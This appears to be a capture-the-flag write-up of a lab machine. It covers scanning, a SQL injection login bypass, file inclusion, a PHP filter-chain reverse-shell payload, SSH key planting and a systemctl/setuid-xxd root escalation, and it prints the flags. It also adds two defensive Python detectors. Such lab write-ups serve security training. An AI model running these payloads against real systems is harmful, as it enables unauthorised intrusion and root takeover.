Hack into the machine and get the flags!
THM{9f2ce3df1beeecaf695b3a8560c682704c31b17a}
THM{dca75486094810807faf4b7b0a929b11e5e0167c}
death@esther:~$ nmap 10.10.228.119 -sV -T 4
PORT STATE SERVICE VERSION
1/tcp open tcpmux?
3/tcp open compressnet?
340/tcp open http Motorola cable modem webadmin
366/tcp open odmr?
389/tcp open telnet Allied Telesis x900-series switch telnetd
406/tcp open melange Melange Chat Server 3VhUqW
407/tcp open pop3-proxy AVG pop3 proxy 346/67007
416/tcp open silverplatter?
417/tcp open onmux?
425/tcp open telnet
427/tcp open telnet
443/tcp open https?
444/tcp open smtp IMail NT-ESMTP ..._.p..c
445/tcp open http Corel Paradox relational database web interface 9.X (Embedded BWS 1.0b3)
458/tcp open printer Microsoft lpd
dirsearch -u 10.10.228.119
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25
Wordlist size: 11460
Output File: /home/death/reports/_10.10.228.119/_24-09-28_01-34-24.txt
Target: http://10.10.228.119/
[01:34:24] Starting:
[01:34:33] 403 - 278B - /.ht_wsr.txt
[01:34:33] 403 - 278B - /.htaccess.bak1
[01:34:33] 403 - 278B - /.htaccess.sample
[01:34:33] 403 - 278B - /.htaccess.orig
[01:34:33] 403 - 278B - /.htaccess.save
[01:34:33] 403 - 278B - /.htaccess_orig
[01:34:33] 403 - 278B - /.htaccess_extra
[01:34:33] 403 - 278B - /.htaccessBAK
[01:34:33] 403 - 278B - /.htaccess_sc
[01:34:33] 403 - 278B - /.htaccessOLD2
[01:34:33] 403 - 278B - /.htaccessOLD
[01:34:33] 403 - 278B - /.html
[01:34:33] 403 - 278B - /.htpasswd_test
[01:34:33] 403 - 278B - /.htm
[01:34:33] 403 - 278B - /.htpasswds
[01:34:33] 403 - 278B - /.httr-oauth
[01:34:35] 403 - 278B - /.php
[01:35:14] 301 - 315B - /images -> http://10.10.228.119/images/
[01:35:14] 200 - 485B - /images/
[01:35:18] 200 - 370B - /login.php
[01:35:25] 200 - 254B - /orders.html
[01:35:34] 403 - 278B - /server-status/
[01:35:34] 403 - 278B - /server-status
[01:35:43] 200 - 254B - /users.html
Task Completed
' || '1'='1';-- -
http://10.10.228.119/secret-script.php?file=/etc/passwd
git clone https://github.com/synacktiv/php_filter_chain_generator.git && cd php_filter_chain_generator && clear && ls
python3 php_filter_chain_generator.py --chain "<?php exec('/bin/bash -c \"bash -i >& /dev/tcp/PUT-YOUR-IP-HERE/4444 0>&1\"'); ?>" | grep "^php" > payload.txt
nc -lnvp 4444
curl "http://10.10.228.119/secret-script.php?file=$(cat payload.txt)"
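As an added defensive example (not part of the original writeup): a small Python scanner that flags the two request shapes used above, a direct file path and a php://filter iconv chain, in Apache-style access logs. The log lines are constructed samples, and the field names and the two-iconv threshold are my own assumptions.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed Apache combined-format lines modelled on the requests above (not real traffic).
SAMPLE_LOG = """\
10.0.0.5 - - [28/Sep/2024:01:40:01 +0000] "GET /secret-script.php?file=/etc/passwd HTTP/1.1" 200 1846 "-" "curl/8.5.0"
10.0.0.5 - - [28/Sep/2024:01:41:12 +0000] "GET /secret-script.php?file=php://filter/convert.iconv.UTF8.CSISO2022KR|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.base64-decode/resource=php://temp HTTP/1.1" 200 12 "-" "curl/8.5.0"
10.0.0.9 - - [28/Sep/2024:01:42:30 +0000] "GET /orders.html HTTP/1.1" 200 254 "-" "Mozilla/5.0"
10.0.0.5 - - [28/Sep/2024:01:43:07 +0000] "GET /secret-script.php?file=php%3A%2F%2Ffilter%2Fconvert.iconv.UTF8.CSISO2022KR%7Cconvert.base64-encode%2Fresource%3Dphp%3A%2F%2Ftemp HTTP/1.1" 200 12 "-" "python-requests/2.32"
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})')

def classify_value(value):
    """Reasons one decoded query-parameter value looks like file-inclusion abuse."""
    v = unquote(value).lower()  # strip a second layer of URL encoding if present
    reasons = []
    if v.startswith("php://filter"):
        reasons.append("php_filter_wrapper")
        # generator output chains dozens of iconv filters; two is already unusual
        if v.count("convert.iconv") >= 2 or "convert.base64-decode" in v:
            reasons.append("iconv_filter_chain")
    if re.search(r"(\.\./|/etc/passwd|/proc/self)", v):
        reasons.append("path_traversal")
    return reasons

def scan_log(text):
    """Return (ip, path, parameter, reasons) for every suspicious request in the log."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        parts = urlsplit(m.group("target"))
        for name, value in parse_qsl(parts.query, keep_blank_values=True):
            reasons = classify_value(value)
            if reasons:
                hits.append((m.group("ip"), parts.path, name, reasons))
    return hits

if __name__ == "__main__":
    for ip, path, param, reasons in scan_log(SAMPLE_LOG):
        print(f"{ip} {path}?{param}= -> {', '.join(reasons)}")
```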
LinPEAS found /home/comte/.ssh/authorized_keys, which is writable by our user. We can create an SSH key pair on our own machine and append the public key to that file, which lets us log in as comte over SSH.
ssh-keygen -t rsa
death@esther:~$ cat .ssh/id_rsa.pub
ssh-rsa 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 death@esther
echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDAFK2k5zBYD1W7EtVkTHU6WcmMw/TOS7WpXtZsiR6QmgwZWv7KzZ43OVTXJ22s8os5NnLp0ABrr0CwjVFoH5uDYcAzKEZp3GtbLVr0TZaNT6Vds8SeZ+5RZzGs/84Ue5FBAQVeak/5+wjZoYezOTV9c7YrkIDSS1Rs0xQ0zfjcIdumzhM5grL+ldpa1HB1J1PzBDfkP2hWwL0pt4et6GhCtpGkYSyS8rLwkU2G/S/qB0iB/OM2hGeWHpbIhQDAB15bVnzjQksBNeagdlFHmQ90pjVG0oTaWp3hpzMrLUav/6Vt/1O2HE8KZ11erIDMgIpNc5nbvSWJfCDFH4JX1/UFod0v/lQTm6LEsnSf1E4CTK/FVAAKuYAd6IM8Ul1//Re2x9Eh5oRRVpIGVwq83di3N8mKiSSLHirL7k+SrkmViJ+hJtaC6FbbxSikjnq5vdqs6k9CzXk6aQKD29NY/npFvKTjxDEJDKiUr7IDOvKLKMx6BS2T7bVePBGidNxwxY8= death@esther
" >> /home/comte/.ssh/authorized_keys
ssh -i id_rsa comte@10.10.228.119
comte@cheesectf:~$ cat user.txt
THM{9f2ce3df1beeecaf695b3a8560c682704c31b17a}
comte@cheesectf:~$ sudo -l
User comte may run the following commands on cheesectf:
(ALL) NOPASSWD: /bin/systemctl daemon-reload
(ALL) NOPASSWD: /bin/systemctl restart exploit.timer
(ALL) NOPASSWD: /bin/systemctl start exploit.timer
(ALL) NOPASSWD: /bin/systemctl enable exploit.timer
comte@cheesectf:~$
We can run systemctl without a password and modify a file called exploit.timer, which can be used to run an exploit service:
comte@cheesectf:/etc/systemd/system$ cat exploit.service
[Unit]
Description=Exploit Service
[Service]
Type=oneshot
ExecStart=/bin/bash -c "/bin/cp /usr/bin/xxd /opt/xxd && /bin/chmod +sx /opt/xxd"
comte@cheesectf:/etc/systemd/system$ cat exploit.timer
[Unit]
Description=Exploit Timer
[Timer]
OnBootSec=
[Install]
WantedBy=timers.target
comte@cheesectf:/etc/systemd/system$
When the timer fires, the service copies xxd to /opt/xxd and marks it setuid. If you are not familiar with xxd, it is a hex dump binary, and GTFOBins documents what a setuid copy of it allows.
According to GTFOBins, we can simply get root by using the setuid xxd binary to write the SSH public key we generated earlier into root's authorized_keys.
sudo systemctl daemon-reload
sudo systemctl start exploit.timer
echo "ssh-rsa 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 death@esther" | xxd | /opt/xxd -r - "/root/.ssh/authorized_keys"
ssh -i id_rsa root@10.10.228.119
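As an added defensive example (not part of the original writeup): a Python audit that takes `sudo -l` output plus the unit files it names and reports the chain found above, a NOPASSWD systemctl rule over a user-writable timer whose service plants a setuid binary. The inputs are constructed copies of the output above; the rule parsing and the per-unit writability flag are my own assumptions.

```python
import re

# Constructed inputs modelled on the writeup above (not captured from a real host).
SUDO_L = """\
User comte may run the following commands on cheesectf:
    (ALL) NOPASSWD: /bin/systemctl daemon-reload
    (ALL) NOPASSWD: /bin/systemctl restart exploit.timer
    (ALL) NOPASSWD: /bin/systemctl start exploit.timer
    (ALL) NOPASSWD: /bin/systemctl enable exploit.timer
"""
# unit name -> (unit file content, is the file writable by the unprivileged user?)
UNITS = {
    "exploit.timer": ("[Unit]\nDescription=Exploit Timer\n[Timer]\nOnBootSec=\n[Install]\nWantedBy=timers.target\n", True),
    "exploit.service": ("[Unit]\nDescription=Exploit Service\n[Service]\nType=oneshot\n"
                        'ExecStart=/bin/bash -c "/bin/cp /usr/bin/xxd /opt/xxd && /bin/chmod +sx /opt/xxd"\n', False),
}

# one sudo rule: "NOPASSWD: /bin/systemctl <verb> [<unit>]" (verb and unit must sit on the same line)
RULE_RE = re.compile(r"NOPASSWD:[ \t]*\S*systemctl[ \t]+(\S+)(?:[ \t]+(\S+))?")
# symbolic (+s) or numeric (4xxx) setuid bit in a chmod call
SUID_RE = re.compile(r"chmod\s+(?:[ugoa]*\+[rwx]*s|[0-7]?[4-7][0-7]{3})")

def exec_start(content):
    """Return the ExecStart= command of a unit file, or '' if it has none."""
    for line in content.splitlines():
        if line.startswith("ExecStart="):
            return line[len("ExecStart="):]
    return ""

def audit(sudo_output, units):
    """Flag sudo systemctl rules that let the user control what root executes."""
    findings = []
    for verb, unit in RULE_RE.findall(sudo_output):
        if verb == "daemon-reload":
            findings.append((verb, "", "reloads unit files edited by the user into root's systemd"))
            continue
        if not unit:
            continue
        _, writable = units.get(unit, ("", False))
        if writable:
            findings.append((verb, unit, "unit file is user-writable, so root runs whatever it points at"))
        # a .timer activates the .service with the same stem; inspect what that service runs
        target = unit[:-len(".timer")] + ".service" if unit.endswith(".timer") else unit
        cmd = exec_start(units.get(target, ("", False))[0])
        if SUID_RE.search(cmd):
            findings.append((verb, target, "ExecStart creates a setuid binary: " + cmd))
    return findings

if __name__ == "__main__":
    for verb, unit, why in audit(SUDO_L, UNITS):
        print(f"systemctl {verb} {unit}: {why}")
```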
root@cheesectf:~# cat /root/root.txt
_ _ _ _ __
___| |__ ___ ___ ___ ___ (_)___ | (_)/ _| ___
/ __| '_ \ / _ \/ _ \/ __|/ _ \ | / __| | | | |_ / _ \
| (__| | | | __/ __/\__ \ __/ | \__ \ | | | _| __/
\___|_| |_|\___|\___||___/\___| |_|___/ |_|_|_| \___|
THM{dca75486094810807faf4b7b0a929b11e5e0167c}
🙂